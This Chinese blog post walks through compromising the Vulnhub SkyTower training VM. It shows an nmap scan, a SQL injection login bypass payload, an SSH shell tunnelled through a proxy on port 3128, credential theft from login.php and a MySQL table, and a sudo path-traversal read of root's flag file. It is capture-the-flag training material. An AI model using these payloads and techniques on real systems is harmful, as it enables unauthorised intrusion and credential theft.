Vulnhub靶机 Skytower(渗透测试详细)

一、靶机配置

1、靶机下载地址
https://www.vulnhub.com/entry/skytower-1,96/
2、下载下来是个SkyTower.vbox文件

3、需要下载VirtualBox进行编译
https://www.virtualbox.org/wiki/Downloads
这是官网地址
4、安装完毕后,点击注册

将下载的SkyTower.vbox文件导入进去

5、点击管理——>导出虚拟电脑

就会出来一个SkyTower.ova文件

6、然后用vmware打开

二、Web渗透测试

1、导入虚拟机,将网卡设置为net

2、利用nmap扫描同一网段
nmap 192.168.31.0/24 

得到靶机IP地址

3、扫描端口和服务版本

得到80和22端口开发

4、访问靶机主页

是个登录框,可以尝试sql注入

邮箱:随便一个都行

密码输入

1111'|| 1=1 #

成功登录,并且得到了默认的账户密码

5、尝试SSH远程连接
ssh john@192.168.31.137

发现连接不上

之前扫描端口发现还开放了一个3128端口,有可能是改过的端口,尝试挂代理

6、挂取3128代理

vim /etc/proxychains4.conf

6、尝试挂取代理连接
proxychains ssh john@192.168.31.137 -t "/bin/sh"

成功连接

三、提权

1、查看sudo用户文件
sudo -l

权限不够,之前login.php存在sql注入,查看一下文件

cat /war/www/login.php

发现数据库信息

2、尝试连接mysql
mysql -u root SkyTech -p

连接成功

3、查看数据库信息
show databases;

进入SkyTech库,查看库中的数据

use SkyTech;
show tables;

查找login表中的所有数据

select * from login;

远程连接sara用户

sudo -l 查看权限

发现accounts有权限,并在根目录下

已知accounts/有权限,查看root目录,发现有个flag.txt文件

sudo cat /accounts/../root/flag.txt

得到root用户的密码

4、重新连接root用户

成功提权!!!

  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值